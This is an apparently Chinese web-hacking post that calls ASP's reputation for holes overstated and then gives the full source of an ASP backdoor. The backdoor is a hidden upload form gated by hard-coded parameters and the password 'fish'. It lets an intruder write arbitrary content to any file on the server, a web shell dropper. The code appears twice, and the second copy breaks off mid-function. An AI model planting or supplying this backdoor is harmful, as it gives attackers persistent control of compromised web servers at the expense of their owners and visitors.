个人认为asp的漏洞其实不多的,为什么网路上说ASP漏洞多,本人认为是由于.ASP研究的人比任何一种WEB语言多的多,不是同一数量级上的概念,所以研究的人多了,也就暴露其问题了,这个没什么好说的是吧?
这段还是其实是一段上传函数,一般的Web Hacker都比较了解。中国管他加小马,外国管他叫Back Door。其实一个道理了。
代码如下:
view plaincopy to clipboardprint?
<%
DoorForm()
pwd()
function DoorForm()
dim iid
iid = request("iid")
if iid= 2006 then
response.write "<form method='post' action='?action=set&door=fine'>" &_
"<label></label>" &_
"<label>" &_
"<textarea name='Text' cols='50' rows='10' id='Text'>写入内容" &_
"</textarea>" &_
"<br />" &_
"<br />" &_
"<input name='FileName' type='text' id='FileName' value='文件名' size='52' maxlength='50' />" &_
"<br />" &_
"<br />" &_
"<input name='Pass' type='password' id='Pass' value='xxxxxxxxxxxxxxxxxxxxxx' size='52' maxlength='50' />" &_
"<br />" &_
"<br />" &_
"</label>" &_
"<label>" &_
"<input type='submit' name='Submit' value='保存' />" &_
"</label>" &_
"</form>"
end if
end function
%>
<%
function pwd()
dim door
door=request("pwd")
if door="fine" then
dim samllbad,pass
pass="fish"
if request("action")="set" then
if request("pass")=pass then
Text=request("Text")
FileName=request("FileName")
set fs=server.CreateObject("Scripting.FileSystemObject")
set file=fs.OpenTextFile(server.MapPath(FileName),8,True)
file.writeline Text
file.close
set file=nothing
set fs=nothing
response.write ("保存成功!")
end if
else
response.write ("密码错误!")
end if
end if
end function
%>
<%
DoorForm()
pwd()
function DoorForm()
dim iid
iid = request("iid")
if iid= 2006 then
response.write "<form method='post' action='?action=set&door=fine'>" &_
"<label></label>" &_
"<label>" &_
"<textarea name='Text' cols='50' rows='10' id='Text'>写入内容" &_
"</textarea>" &_
"<br />" &_
"<br />" &_
"<input name='FileName' type='text' id='FileName' value='文件名' size='52' maxlength='50' />" &_
"<br />" &_
"<br />" &_
"<input name='Pass' type='password' id='Pass' value='xxxxxxxxxxxxxxxxxxxxxx' size='52' maxlength='50' />" &_
"<br />" &_
"<br />" &_
"</label>" &_
"<label>" &_
"<input type='submit' name='Submit' value='保存' />" &_
"</label>" &_
"</form>"
end if
end function
%>
<%
function pwd()
dim door
door=request("pwd")
if door="fine" then
dim samllbad,pass
pass="fish"
if request("action")="set" then
if request("pass")=pass then
Text=request("Text")
FileName=request("FileName") |